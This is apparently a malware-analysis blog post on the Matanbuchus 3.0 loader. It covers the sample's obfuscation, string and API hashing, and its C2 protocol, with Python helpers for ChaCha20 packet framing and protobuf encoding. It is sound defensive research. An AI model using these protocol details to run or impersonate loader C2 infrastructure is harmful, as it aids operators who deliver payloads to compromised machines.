Matanbuchus 3.0 — A Deep Dive into a Loader-as-a-Service

Disclaimer: This blog and all associated research are part of my personal independent study. All hardware, software, and infrastructure are personally owned and funded. No employer resources, property, or proprietary information are used in any part of this work. All opinions and content are my own.

1. Introduction

Matanbuchus is a Loader-as-a-Service (LaaS) that has been active in the cybercriminal underground since at least 2021, marketed and sold on dark web forums under the operator alias BelialDemon. The malware operates as a first-stage loader within a multi-phase infection chain: once deployed on a compromised host, it establishes persistence, fingerprints the victim’s environment, opens a covert communication channel with a remote command-and-control server, and subsequently retrieves and executes secondary payloads at the operator’s discretion. Its service-based business model means that multiple threat actors may employ the same tooling with different C2 infrastructure, making Matanbuchus a recurring presence across diverse intrusion campaigns.

In December 2025, Zscaler’s ThreatLabz published a detailed technical analysis of Matanbuchus 3.0, covering its updated C2 protocol, protobuf serialization, and command structure. In February 2026, Huntress released a complementary write-up documenting a Matanbuchus variant delivered via a ClickFix social-engineering campaign, covering the initial delivery chain and basic obfuscation.

This report presents our independent, ground-up analysis of a Matanbuchus 3.0 sample obtained in early 2026. Its main contributions are:

A systematic, granular breakdown of seven distinct obfuscation techniques working in concert, including a detailed examination of the opaque predicate system featuring 34 mutable global variables with runtime write-back mutation—a significant evolution from the simpler 3-variable static approach observed in earlier variants
Complete wire-format documentation of the C2 communication protocol, including the previously undocumented asymmetric length-prefix framing behavior (client-to-server packets carry a 4-byte prefix; server-to-client responses do not), the 48-byte ChaCha20 packet header structure, and the precise nanopb protobuf message schemas reverse-engineered from embedded descriptors
Comprehensive analysis of all 13 command handlers (IDs 1 through 13) and their underlying dispatch architecture, which routes tasks through 6 categorized linked lists with support for payload delivery, system reconnaissance, remote execution, and self-destruct capabilities
The development and live validation of a fully functional C2 server simulator implemented in Python, capable of completing the entire registration–tasking–result collection lifecycle against the actual malware binary executing in a sandboxed environment, thereby confirming the accuracy of our protocol reverse engineering

1.1 Sample Information

Property	Value
SHA256	77a53dc757fdf381d3906ab256b74ad3cdb7628261c58a62bcc9c6ca605307ba
File Type	PE32 DLL (Dynamic Link Library)
Exports	Start, DllEntryPoint
C2 Domain	mechiraz[.]com
C2 Endpoints	/api/v1 (register), /api/v2 (poll/results)
Encryption	ChaCha20 (no Poly1305 MAC)
Serialization	nanopb (lightweight Protocol Buffers)
Transport	WinHTTP, HTTPS POST, Content-Type: application/octet-stream
Polling Interval	300 seconds (5 minutes)

2. Execution Flow

The malware is packaged as a 32-bit PE DLL and must be loaded via SysWOW64\rundll32.exe using the exported function Start as the entry point. Attempting to invoke the DLL with the 64-bit rundll32.exe or through an incorrect export name will result in silent failure. The initialization sequence is methodical: the entry point hands off control to a core setup routine that decrypts all embedded strings via ChaCha20, resolves critical Windows API functions through MurmurHash3-based dynamic lookup, generates a unique bot identifier derived from system characteristics, collects detailed host fingerprinting data, and ultimately spawns a dedicated thread responsible for all subsequent C2 communication and command execution.

2.1 Execution Chain

Figure: Matanbuchus execution chain, from DllEntryPoint to the C2 thread

2.2 Key Functions

Address	Function Name	Purpose
0x1007A1E0	mw_Start	Exported entry point, calls mw_main_init
0x100739C0	mw_main_init	Core initialization: crypto, API resolution, C2 thread spawn
0x10069210	mw_c2_thread	Main C2 loop: register → poll → dispatch (3,258 lines, 500+ locals)
0x10075020	mw_command_dispatcher_loop	Processes task linked lists, dispatches to command handlers
0x1004D0F0	mw_register_beacon	Builds and sends registration protobuf
0x10048700	mw_get_tasks_from_c2	Polls C2 for tasks, parses TaskResponse
0x100613D0	mw_http_send_recv	WinHTTP POST wrapper with ChaCha20 encrypt/decrypt
0x10058180	mw_chacha20_decrypt_packet	Decrypts incoming C2 response
0x100587F0	mw_chacha20_encrypt_packet	Encrypts outgoing C2 request
0x10002900	mw_resolve_apis	MurmurHash-based dynamic API resolution

3. Obfuscation Techniques

Matanbuchus 3.0 employs a sophisticated, multi-layered obfuscation framework comprising seven distinct techniques that operate synergistically to impede both static and dynamic analysis. Collectively, these mechanisms inflate the binary from an estimated 100 KB of genuine operational logic to approximately 59 MB of total file size, with roughly 90% of all decompiled code constituting pure noise. For the reverse engineer, recognizing and mentally filtering these obfuscation layers is the single most important prerequisite for productive analysis. Once the analyst develops a reliable intuition for distinguishing real logic from noise—primarily by tracing function calls and ignoring local variable assignments—the underlying malware behavior becomes considerably more tractable. The table below provides a summary of each technique; detailed analysis follows in the subsections.

#	Technique	Impact	Key Indicator
1	Opaque Predicates	Control flow obfuscation	34 mutable globals at 0x1011A160–0x1011A220
2	Dead Store Injection	~90% junk code per function	500+ locals, 0x33B0 stack frames
3	Junk API Calls	Anti-analysis noise	GetCursorPos, IsIconic, GetACP calls
4	Arithmetic Obfuscation	Obscured constants/indices	imul/shl chains for simple values
5	String Encryption	No plaintext strings	ChaCha20 with key at 0x10112000
6	Dynamic API Resolution	Sensitive APIs absent from import table	MurmurHash3 with seed 0x4F1866
7	Binary Size Inflation	59 MB total file size	.data section: 57.7 MB of junk

3.1 Opaque Predicates

The most pervasive obfuscation technique in this sample is a system of 34 mutable global variables located at addresses 0x1011A160 through 0x1011A220. These globals serve as the foundation for opaque predicates: conditional branches whose outcomes are fixed by construction but appear data-dependent to the analyst. What distinguishes this implementation from conventional opaque predicates is its runtime write-back mutation: each time an opaque predicate is evaluated, the branch body modifies one or more globals with values derived from arithmetic transformations of their current state. The result is a cascading chain of state changes in which the value of each global depends on the entire prior execution history, which makes static symbolic evaluation of the branch conditions impractical even though each branch still resolves the same way on every run.

The global variables employ intentionally mixed data types—including byte, word, dword, and qword—which forces the decompiler to generate type casts and sign-extension operations that further obscure the code. The write-back mutations incorporate a diverse set of arithmetic and bitwise operations (XOR, addition with carry, modular multiplication, bit rotation), and—critically—the return values from junk API calls (see Section 3.3) are fed directly into these globals. This means the predicate state becomes partially dependent on the execution environment (cursor position, code page, tick count), creating a form of environment-sensitive anti-analysis that varies across machines and execution contexts.

// Example opaque predicate pattern from mw_c2_thread
// Real code buried between predicate checks:

global_1011A1C0 = (global_1011A1C0 ^ 0x3FA7) + result_GetACP;
if ( (global_1011A1A8 & 0x7F3E) > 0x1234 )  // Always true or always false
{
    v350 = some_junk_computation;
    global_1011A1E0 = v350 * 0x91;           // Write-back mutation
}
// ... actual C2 logic follows ...

Address Range	Count	Types	Notes
0x1011A160–0x1011A180	8	DWORD, QWORD	Primary predicate set
0x1011A180–0x1011A1A0	8	BYTE, WORD, DWORD	Mixed-type set
0x1011A1A0–0x1011A1C0	8	DWORD, QWORD	Secondary predicate set
0x1011A1C0–0x1011A1E0	5	WORD, DWORD	API-seeded set
0x1011A1E0–0x1011A220	5	DWORD, QWORD	Write-back mutation targets

3.2 Dead Store Injection

Every function of significance within the binary is aggressively inflated with hundreds of dead store operations—assignments to local variables whose values are never subsequently consumed by any meaningful computation path. These dead stores are not trivial single-instruction insertions; they often involve multi-step arithmetic expressions, memory reads, and interactions with the opaque predicate globals, making them difficult to distinguish from legitimate logic through casual inspection alone. The C2 thread function (mw_c2_thread) provides the most extreme illustration: IDA Pro’s decompiler produces 3,258 lines of pseudocode with over 500 declared local variables and a stack frame of 0x33B0 bytes, of which our analysis estimates approximately 90% to be dead store noise. The practical effect is that an analyst must carefully trace data flow from function call return values and system API results to identify the thin thread of genuine C2 logic woven through thousands of lines of carefully constructed noise.

Function	Total Lines	Est. Real Lines	Local Variables	Stack Size
mw_c2_thread	3,258	~300	500+	0x33B0
mw_register_beacon	~2,000	~200	350+	0x2800
mw_get_tasks_from_c2	~1,500	~150	300+	0x2400
mw_handle_exe_cmd	~1,800	~180	400+	0x2C00

// Dead store example from mw_c2_thread
// Notice: v87, v88, v90, v91 feed only each other and a predicate global;
// none of them ever reaches the real C2 logic

v87 = global_1011A1A0 * 0x47;
v88 = v87 + GetCursorPos(&pt);
v89 = actual_c2_registration_call();  // <-- REAL CODE
v90 = v88 ^ 0xBEEF;
v91 = v90 + IsIconic(0);
global_1011A1C8 = v91;                // Write-back to opaque predicate
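
The filtering rule described above (keep real calls, drop assignments that never reach them) can be sketched as a backward liveness pass. This is a toy model under stated assumptions, not a decompiler plugin: the tuple format, the function name needed_statements, and the decision to treat junk API calls as side-effect free are all hypothetical choices made for illustration.

```python
def needed_statements(stmts, sinks=()):
    """Backward liveness pass over straight-line code.

    stmts: list of (dest, uses, pinned) tuples in program order.
    pinned marks statements kept for their side effects (real calls).
    sinks: names whose final values are treated as observable.
    Returns the indices of the statements that must be kept.
    """
    live = set(sinks)
    keep = []
    for i in range(len(stmts) - 1, -1, -1):
        dest, uses, pinned = stmts[i]
        if pinned or dest in live:
            keep.append(i)
            live.discard(dest)   # this definition satisfies the demand
            live.update(uses)    # its inputs become demanded in turn
    return sorted(keep)


# The six statements of the dead store example, modeled by hand.
# Assumption: GetCursorPos/IsIconic are treated as having no side effects.
SNIPPET = [
    ("v87", ["global_1011A1A0"], False),
    ("v88", ["v87"], False),
    ("v89", [], True),                    # the real registration call
    ("v90", ["v88"], False),
    ("v91", ["v90"], False),
    ("global_1011A1C8", ["v91"], False),  # write-back to a predicate global
]

# Predicate globals ignored: only the real call survives.
print(needed_statements(SNIPPET))
# Predicate global treated as observable: the whole junk chain looks live.
print(needed_statements(SNIPPET, sinks={"global_1011A1C8"}))
```

The second call shows why the write-back matters: a generic dead-code pass that treats global writes as observable keeps every junk statement, so the predicate globals have to be excluded explicitly before the noise falls away.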

3.3 Junk API Calls

Interspersed throughout the code are calls to legitimate Windows API functions whose return values serve no functional purpose within the malware’s operational logic. These junk API invocations fulfill a dual obfuscation role. First, they generate substantial noise in dynamic analysis traces—an API monitor or sandbox log will contain hundreds of seemingly meaningful system calls that mask the relatively few calls that actually matter. Second, and more insidiously, their return values are fed directly into the opaque predicate globals (Section 3.1), meaning these calls actively participate in the runtime mutation of the predicate state. Because functions like GetCursorPos and GetACP return environment-dependent values, they introduce a degree of non-determinism into the predicate chain that further frustrates automated deobfuscation attempts.

API Function	Typical Arguments	Purpose in Obfuscation
GetEnvironmentVariableW	Random variable names	Return value seeds opaque predicates; triggers API logging noise
GetCursorPos	Stack pointer	Mouse position feeds into global mutation; environment-dependent
IsIconic	NULL or window handle	Window state check; return value used in arithmetic chains
GetACP	(none)	ANSI code page; locale-dependent seed for predicates
GetTickCount	(none)	Timing-dependent value for predicate mutation

3.4 Arithmetic Obfuscation

Throughout the binary, simple integer constants and array indices are replaced with multi-step arithmetic expressions that arrive at the same value through obfuscated computation. The obfuscation framework also exploits compiler behavior by promoting 32-bit values to __int64 type, triggering the use of 64-bit imul and shl instruction sequences in the generated assembly. These patterns closely resemble legitimate compiler optimizations for division-by-constant and modular arithmetic, which makes them particularly insidious: an analyst cannot simply flag all arithmetic chains as junk, because the same instruction patterns appear in genuine compiler-generated code. Careful data-flow tracing is required to determine whether a given arithmetic sequence feeds into a meaningful operation or is merely decorative noise.

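// Arithmetic obfuscation example
// A plain lookup, ((DWORD *)base)[i % 5], is emitted as:

v42 = (unsigned __int64)(0x66666667i64 * (int)v41) >> 32;     // high 32 bits of the magic multiply
v43 = (((int)v42 >> 1) + ((unsigned int)v42 >> 31)) * 5;      // (i / 5) * 5
result = *(DWORD *)(base + (v41 - v43) * 4);                  // byte offset = (i % 5) * 4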
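
When triaging such chains it helps to recognize the standard compiler idiom they imitate. The sketch below models the signed divide-by-5 sequence built on the constant 0x66666667 (high half of the product, arithmetic shift right by one, add the sign bit) and checks it against C-style remainder. The function names are hypothetical, and the code models 32-bit signed arithmetic with Python integers rather than reproducing anything from the sample.

```python
import math


def mod5_idiom(x: int) -> int:
    """Model of the compiler idiom for x % 5 on a signed 32-bit x."""
    hi = (0x66666667 * x) >> 32            # high 32 bits of the signed product
    q = (hi >> 1) + (1 if hi < 0 else 0)   # sar 1, then add sign bit: trunc(x / 5)
    return x - q * 5


def c_remainder(x: int, n: int) -> int:
    """C-style remainder: the result takes the sign of the dividend."""
    return int(math.fmod(x, n))


if __name__ == "__main__":
    samples = list(range(-50, 51)) + [2**31 - 1, -(2**31)]
    mismatches = [x for x in samples if mod5_idiom(x) != c_remainder(x, 5)]
    print("mismatches:", mismatches)
```

A chain that reduces to a known idiom like this one and feeds an index or a call argument is likely genuine; one that matches no idiom and ends in a predicate global is likely noise.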

3.5 String Encryption (ChaCha20)

No meaningful plaintext strings exist within the binary at rest. All operationally significant strings—including C2 URLs, HTTP headers, user-agent strings, registry key paths, and WMI query templates—are encrypted using ChaCha20 and stored in a consolidated encrypted string table. At runtime, individual strings are decrypted on demand by invoking the decryptor function with a table index. The same static 32-byte key and 12-byte nonce are used for all string decryption operations, meaning that recovery of these two values enables bulk decryption of the entire string table—a significant analytical shortcut once identified. Decrypted strings are cached in heap-allocated buffers for subsequent lookups, so a memory dump of the running process will reveal the full set of decrypted strings if captured after the initialization phase completes.

Component	Address	Size	Description
ChaCha20 Key	0x10112000	32 bytes	Static encryption key for all strings
ChaCha20 Nonce	0x10112020	12 bytes	Static nonce
Encrypted Table	0x101128A8	Variable	Table of encrypted string entries
Decryptor Function	0x10005520 (sub_10005520)	—	Decrypts a string by table index

// String decryption pattern
// sub_10005520(index) returns decrypted string

wchar_t* url = sub_10005520(42);    // Decrypts C2 URL
wchar_t* ua  = sub_10005520(37);    // Decrypts User-Agent
// Strings are decrypted into heap-allocated buffers
// and cached for subsequent lookups

3.6 Dynamic API Resolution (MurmurHash3)

To avoid revealing its capabilities through the import address table, the malware resolves virtually all sensitive Windows API functions at runtime through a custom dynamic resolution mechanism. The resolver employs MurmurHash3_x86_32 with a hardcoded seed of 0x4F1866 to hash API function names. During initialization, the batch resolver (mw_resolve_apis at 0x10002900) iterates through a table of target hashes, walks the export directory of each loaded DLL, computes the MurmurHash3 of every export name, and stores matching function pointers in a global resolution table. This approach means the PE import table contains only a minimal set of benign imports required for the loader stub, while the actual operational API surface—including WinHTTP networking functions, process manipulation APIs, and memory management routines—remains invisible to static analysis tools. The hash seed value is a useful signature for detection: any binary computing MurmurHash3 with seed 0x4F1866 against DLL export names is a strong indicator of Matanbuchus lineage.

Component	Address	Description
Hash Function	0x10004870 (sub_10004870)	MurmurHash3_x86_32 implementation
API Resolver	0x10002FB0 (sub_10002FB0)	Walks DLL exports, matches by hash
Batch Resolver	0x10002900 (mw_resolve_apis)	Resolves all APIs during initialization
Hash Seed	0x4F1866	Constant seed for MurmurHash3

Selected API hash mappings:

API Function	Hash Value	DLL
Sleep	0x84C78203	kernel32.dll
VirtualAlloc	0xE0C220B3	kernel32.dll
VirtualFree	0x2B4E48A5	kernel32.dll
CreateThread	0x0A2A72F0	kernel32.dll
WinHttpOpen	0x97C6D21E	winhttp.dll
WinHttpConnect	0xAB2F5712	winhttp.dll
WinHttpSendRequest	0x39017E3F	winhttp.dll
WinHttpReceiveResponse	0x6B9B1826	winhttp.dll
WinHttpReadData	0xB2D17E24	winhttp.dll
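
For analysts who want to rebuild the hash table offline, the following is a minimal sketch of MurmurHash3_x86_32 plus a lookup helper. The hash routine follows the public reference algorithm; the helper name resolve_hashes and the input normalization (ASCII export name, case preserved, no terminator) are assumptions, and the output has not been checked against the hash values listed above.

```python
SEED = 0x4F1866  # seed reported for this sample
MASK = 0xFFFFFFFF


def _rotl32(v: int, r: int) -> int:
    return ((v << r) | (v >> (32 - r))) & MASK


def murmur3_x86_32(data: bytes, seed: int = SEED) -> int:
    """Reference MurmurHash3_x86_32 over a byte string."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h = seed & MASK
    nblocks = len(data) // 4
    for i in range(nblocks):
        k = int.from_bytes(data[4 * i:4 * i + 4], "little")
        k = (_rotl32((k * c1) & MASK, 15) * c2) & MASK
        h = (_rotl32(h ^ k, 13) * 5 + 0xE6546B64) & MASK
    tail = data[4 * nblocks:]
    if tail:
        k = int.from_bytes(tail, "little")
        k = (_rotl32((k * c1) & MASK, 15) * c2) & MASK
        h ^= k
    h ^= len(data)
    h ^= h >> 16                      # final avalanche (fmix32)
    h = (h * 0x85EBCA6B) & MASK
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & MASK
    h ^= h >> 16
    return h


def resolve_hashes(targets, export_names, seed: int = SEED):
    """Map each target hash to the export name that produces it, if any."""
    by_hash = {murmur3_x86_32(n.encode("ascii"), seed): n for n in export_names}
    return {t: by_hash.get(t) for t in targets}


if __name__ == "__main__":
    for name in ("Sleep", "VirtualAlloc", "WinHttpOpen"):
        print(f"{name}: 0x{murmur3_x86_32(name.encode('ascii')):08X}")
```

If the printed values do not match the table, the first things to vary are the normalization assumptions: lowercasing the name, including the trailing NUL, or hashing a wide-character string.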

3.7 Binary Size Inflation

The compiled binary is dramatically inflated to approximately 59 MB, roughly 600 times larger than the estimated size of its actual executable logic. The inflation is achieved primarily through a massive .data section padded with 57.7 MB of non-functional data. This technique serves multiple evasion purposes: many automated sandbox environments impose file-size thresholds and will skip or time out on oversized samples; malware repositories and analysis pipelines may reject uploads exceeding size limits; and manual analysis tools (disassemblers, decompilers, hex editors) experience degraded performance when processing files of this magnitude. The approach is crude but effective: it imposes a tangible cost on every stage of the analysis pipeline while requiring essentially zero effort from the malware developer.

Section	Virtual Size	Raw Size	Characteristics
.text	876 KB	876 KB	Code — contains all executable logic
.rdata	~200 KB	~200 KB	Read-only data, protobuf descriptors
.data	57.7 MB	57.7 MB	Junk padding data
.rsrc	~4 KB	~4 KB	Resources (minimal)
Total	~59 MB	~59 MB	~600x inflation over real code
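
A quick triage check for this kind of padding is to read the section table and see whether one section dominates the file. The sketch below parses the PE headers with the standard library only; the function names are hypothetical, and what share counts as suspicious is left to the analyst.

```python
import struct


def section_sizes(pe: bytes):
    """Return [(name, virtual_size, raw_size)] from a PE image's section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size      # section table follows the optional header
    sections = []
    for i in range(num_sections):
        name, vsize, _rva, raw = struct.unpack_from("<8sIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, raw))
    return sections


def dominant_section(pe: bytes):
    """Return (name, share) for the section with the most raw data."""
    sizes = section_sizes(pe)
    total = sum(raw for _, _, raw in sizes) or 1
    name, _, raw = max(sizes, key=lambda s: s[2])
    return name, raw / total
```

Run against the sample described here, dominant_section would be expected to report .data with a share close to 1.0, since that section accounts for 57.7 MB of the roughly 59 MB file.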

3.8 Comparison with Prior Variants

A side-by-side comparison of our sample with the variant analyzed by Huntress reveals meaningful evolutionary progression in the obfuscation framework. While the core architecture remains consistent—both variants employ the same fundamental obfuscation categories (opaque predicates, dead stores, ChaCha20 string encryption, MurmurHash3 API resolution)—the implementation sophistication has increased substantially. The opaque predicate system, in particular, has undergone a significant upgrade: from 3 fixed-value globals to 34 mutable globals with active write-back mutation and environment-dependent seeding. This suggests that the Matanbuchus developers are actively investing in hardening their obfuscation layer against the specific deobfuscation techniques published by the security research community.

Feature	This Sample	Huntress Variant
Opaque Predicate Globals	34 mutable	3 fixed
Global Types	Mixed (byte/word/dword/qword)	DWORD only
Write-back Mutation	Yes — every branch updates globals	No — globals are static
Environment Seeding	Yes — junk API returns seed globals	No
Dead Stores per Function	350+ (major functions)	~100
String Encryption	ChaCha20	ChaCha20
API Resolution	MurmurHash3 (seed 0x4F1866)	MurmurHash3 (same seed)
Binary Size	~59 MB	~59 MB

4. C2 Communication Protocol

The command-and-control protocol employs a clean layered architecture with well-defined boundaries between transport, encryption, and serialization. At the transport layer, all communication flows over HTTPS using WinHTTP POST requests. The encryption layer wraps every payload in a ChaCha20 cipher stream with per-packet random keys. The serialization layer uses nanopb-based Protocol Buffers to structure messages. A critical and previously undocumented detail uncovered during our analysis is the asymmetric framing of packets: client-to-server transmissions include a 4-byte little-endian length prefix before the encrypted payload, while server-to-client responses are sent as raw encrypted payloads without any length prefix. A C2 server implementation that does not account for this asymmetry will fail to communicate with the malware.

4.1 Transport Layer

All C2 communication is conducted over HTTPS using the WinHTTP API suite (not the higher-level WinINet library). The malware resolves WinHTTP functions dynamically via MurmurHash3 and establishes a persistent HTTPS session to the hardcoded C2 domain. Every request is a POST with Content-Type: application/octet-stream, carrying a binary payload consisting of the encrypted protobuf message. Two distinct endpoints are used: /api/v1 exclusively for initial bot registration, and /api/v2 for all subsequent operations including task polling and result reporting. The choice of WinHTTP over WinINet is noteworthy because WinHTTP provides more granular control over TLS settings and proxy configuration, and is less likely to trigger behavioral detections that monitor WinINet’s higher-level caching and cookie-handling mechanisms.

Property	Registration	Task Polling / Result Reporting
Endpoint	POST /api/v1	POST /api/v2
Content-Type	application/octet-stream	application/octet-stream
TLS	HTTPS (port 443)	HTTPS (port 443)
Client Framing	4-byte LE length prefix + encrypted payload	4-byte LE length prefix + encrypted payload
Server Framing	No length prefix — raw encrypted payload	No length prefix — raw encrypted payload
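
The framing asymmetry in the table can be sketched from the server's point of view as follows. The function names are hypothetical, and the sketch assumes the 4-byte prefix counts exactly the bytes that follow it (the 48-byte header plus ciphertext), which the table does not state explicitly.

```python
import struct


def frame_client_request(packet: bytes) -> bytes:
    """Client-to-server: 4-byte little-endian length prefix, then the packet."""
    return struct.pack("<I", len(packet)) + packet


def unframe_client_request(body: bytes) -> bytes:
    """Server side: strip and validate the prefix of an incoming POST body."""
    if len(body) < 4:
        raise ValueError("body too short for length prefix")
    (declared,) = struct.unpack_from("<I", body, 0)
    # Assumption: the prefix covers everything after itself.
    if declared != len(body) - 4:
        raise ValueError(f"prefix says {declared}, body carries {len(body) - 4}")
    return body[4:]


def frame_server_response(packet: bytes) -> bytes:
    """Server-to-client: the encrypted packet is sent as-is, with no prefix."""
    return packet
```

Keeping the two directions in separate functions makes the asymmetry hard to forget: a simulator that reuses the client framing for its responses would shift every header field by four bytes on the malware side.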
Handler Function	mw_register_beacon (0x1004D0F0)	mw_get_tasks_from_c2 (0x10048700)

4.2 Packet Encryption (ChaCha20)

Every packet exchanged between client and server is encrypted using the ChaCha20 stream cipher. Each packet carries a self-contained 48-byte header prepended to the ciphertext, which includes all the cryptographic material necessary for decryption: a randomly generated 32-byte key, a 12-byte nonce, and a 4-byte little-endian integer specifying the plaintext size. This per-packet key generation means that even identical plaintext payloads will produce different ciphertexts across transmissions. A notable weakness in this design is the absence of a Poly1305 MAC or any other authentication tag: the malware uses raw ChaCha20 rather than the authenticated ChaCha20-Poly1305 construction. Because the key and nonce also travel in the clear inside the packet header, this layer provides obfuscation rather than confidentiality or integrity, and only the surrounding TLS session protects the traffic. Anyone able to intercept that session (for example, through a TLS-inspecting proxy) could modify ciphertext bytes or re-encrypt an arbitrary payload, and the malware would decrypt and process the result without detecting the manipulation.

ChaCha20 packet structure - 48-byte header layout

Offset	Size	Field	Description
0x00	32 bytes	ChaCha20 Key	Randomly generated per-packet encryption key
0x20	12 bytes	ChaCha20 Nonce	Randomly generated per-packet nonce
0x2C	4 bytes	Plaintext Size	Little-endian uint32, size of decrypted protobuf
0x30	Variable	Ciphertext	ChaCha20-encrypted protobuf data
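
The header layout above is enough to build and parse packets offline. The sketch below pairs a plain RFC 8439 ChaCha20 keystream with hypothetical pack_packet and unpack_packet helpers. One parameter is an assumption: the initial block counter is not documented here, so it defaults to 0 and should be adjusted if decryption yields garbage.

```python
import os
import struct

MASK = 0xFFFFFFFF


def _rotl(v, n):
    return ((v << n) | (v >> (32 - n))) & MASK


def _quarter(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl(s[b] ^ s[c], 7)


def _block(key, counter, nonce):
    init = (list(struct.unpack("<4I", b"expand 32-byte k"))
            + list(struct.unpack("<8I", key))
            + [counter & MASK]
            + list(struct.unpack("<3I", nonce)))
    s = init[:]
    for _ in range(10):  # 10 double rounds = 20 rounds
        _quarter(s, 0, 4, 8, 12); _quarter(s, 1, 5, 9, 13)
        _quarter(s, 2, 6, 10, 14); _quarter(s, 3, 7, 11, 15)
        _quarter(s, 0, 5, 10, 15); _quarter(s, 1, 6, 11, 12)
        _quarter(s, 2, 7, 8, 13); _quarter(s, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK for x, y in zip(s, init)))


def chacha20_xor(key, nonce, data, counter=0):
    """Encrypt or decrypt data (the operation is symmetric)."""
    out = bytearray()
    for i in range(0, len(data), 64):
        keystream = _block(key, counter + i // 64, nonce)
        out += bytes(a ^ b for a, b in zip(data[i:i + 64], keystream))
    return bytes(out)


def pack_packet(plaintext, counter=0):
    """key (32) | nonce (12) | plaintext size (4, LE) | ciphertext."""
    key, nonce = os.urandom(32), os.urandom(12)
    header = key + nonce + struct.pack("<I", len(plaintext))
    return header + chacha20_xor(key, nonce, plaintext, counter)


def unpack_packet(packet, counter=0):
    if len(packet) < 48:
        raise ValueError("packet shorter than 48-byte header")
    key, nonce = packet[:32], packet[32:44]
    (size,) = struct.unpack_from("<I", packet, 44)
    if size > len(packet) - 48:
        raise ValueError("declared plaintext size exceeds ciphertext")
    return chacha20_xor(key, nonce, packet[48:48 + size], counter)
```

Because nothing authenticates the packet, unpack_packet can only sanity-check the size field; any further validation has to happen when the plaintext is parsed as protobuf.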

4.3 Protobuf Serialization (nanopb)

The malware uses nanopb, a lightweight, pure-C implementation of Google’s Protocol Buffers designed for resource-constrained and embedded environments. Unlike standard protobuf implementations that generate code from .proto schema files, nanopb embeds compact binary descriptors directly in the compiled binary’s .rdata section. These descriptors define the field numbers, wire types, and nesting relationships for each message type. By locating and parsing these descriptors, we were able to reconstruct the complete protobuf schema without access to the original source definitions—a crucial step that enabled the development of our C2 server simulator.

Descriptor Address	Message Name	Field Count	Usage
0x100DDB18	OuterWrapper	3	Wraps registration and result-report messages
0x100DDB30	TaskResponse	3+	Server response containing task entries
0x100DDB48	TaskEntry	5+	Individual task with command ID and parameters
0x100DDB60	ResultReport	3	Client report of task execution results

4.4 Outer Wrapper

Registration and result-report messages, as well as task-poll requests (Section 4.6), are encapsulated within an OuterWrapper protobuf envelope that provides message-type discrimination and status signaling. This wrapper contains three fields: a data bytes field carrying the serialized inner message, a request_type varint indicating the operation (register, poll, or report), and a status varint used in server responses to signal success or failure. An important protocol asymmetry must be noted: while registration and result-report messages use this OuterWrapper envelope, the task polling response bypasses it entirely, and the server sends a raw TaskResponse protobuf without any OuterWrapper encapsulation. This inconsistency is not immediately obvious from static analysis alone and was confirmed through live traffic analysis during our C2 simulation testing.

Field #	Name	Protobuf Type	Description
1	data	bytes	Serialized inner message (registration beacon or result report)
2	request_type	varint	1 = Register, 2 = GetTasks, 3 = ReportResults
3	status	varint	Response status (must be non-zero/1 for success)
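
The three-field envelope is small enough to encode and decode by hand. The sketch below uses only the protobuf wire rules (varint and length-delimited fields); the function names are hypothetical, and omitting zero-valued fields on encode is an assumption about how the malware's nanopb build behaves.

```python
def encode_varint(n: int) -> bytes:
    out = bytearray()
    while True:
        low, n = n & 0x7F, n >> 7
        if n:
            out.append(low | 0x80)   # more bytes follow
        else:
            out.append(low)
            return bytes(out)


def decode_varint(buf: bytes, pos: int):
    result = shift = 0
    while True:
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def encode_outer_wrapper(data: bytes = b"", request_type: int = 0, status: int = 0) -> bytes:
    out = b""
    if data:
        out += b"\x0a" + encode_varint(len(data)) + data   # field 1, bytes
    if request_type:
        out += b"\x10" + encode_varint(request_type)       # field 2, varint
    if status:
        out += b"\x18" + encode_varint(status)             # field 3, varint
    return out


def parse_outer_wrapper(buf: bytes) -> dict:
    names = {1: "data", 2: "request_type", 3: "status"}
    msg = {"data": b"", "request_type": 0, "status": 0}
    pos = 0
    while pos < len(buf):
        tag, pos = decode_varint(buf, pos)
        field, wire = tag >> 3, tag & 7
        if wire == 0:
            value, pos = decode_varint(buf, pos)
        elif wire == 2:
            length, pos = decode_varint(buf, pos)
            value, pos = buf[pos:pos + length], pos + length
        else:
            raise ValueError(f"unexpected wire type {wire}")
        if field in names:
            msg[names[field]] = value
    return msg
```

For example, a minimal successful registration reply would be encode_outer_wrapper(status=1), which serializes to the two bytes 18 01 before encryption.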

4.5 Registration Beacon

Upon establishing initial contact with the C2 server, the malware constructs and transmits a comprehensive registration beacon containing detailed system fingerprinting data. This beacon serves as the bot’s self-introduction to the operator’s infrastructure, providing all the information necessary for the operator to assess the compromised host’s value, target appropriate secondary payloads, and tailor subsequent tasking. The beacon is serialized as a protobuf message, wrapped in an OuterWrapper with request_type=1, encrypted with a fresh ChaCha20 key, prefixed with a 4-byte length header, and transmitted via HTTPS POST to the /api/v1 registration endpoint.

Field #	Name	Type	Description
1	bot_id	string (UTF-16LE)	Unique bot identifier, generated from system info
2	os_version	string (UTF-16LE)	Windows version string (e.g., “10.0”)
3	computer_name	string (UTF-16LE)	NetBIOS computer name
4	username	string (UTF-16LE)	Current logged-in username
5	domain	string (UTF-16LE)	Domain or workgroup name
6	is_admin	varint (bool)	1 if running with admin privileges
7	is_64bit	varint (bool)	1 if running on 64-bit OS
8	cpu_info	string (UTF-16LE)	Processor name from registry
9	gpu_info	string (UTF-16LE)	GPU description from WMI
10	ram_mb	varint	Total physical RAM in MB
11	install_date	string (UTF-16LE)	Windows installation date
12	antivirus	string (UTF-16LE)	Installed AV product name(s)

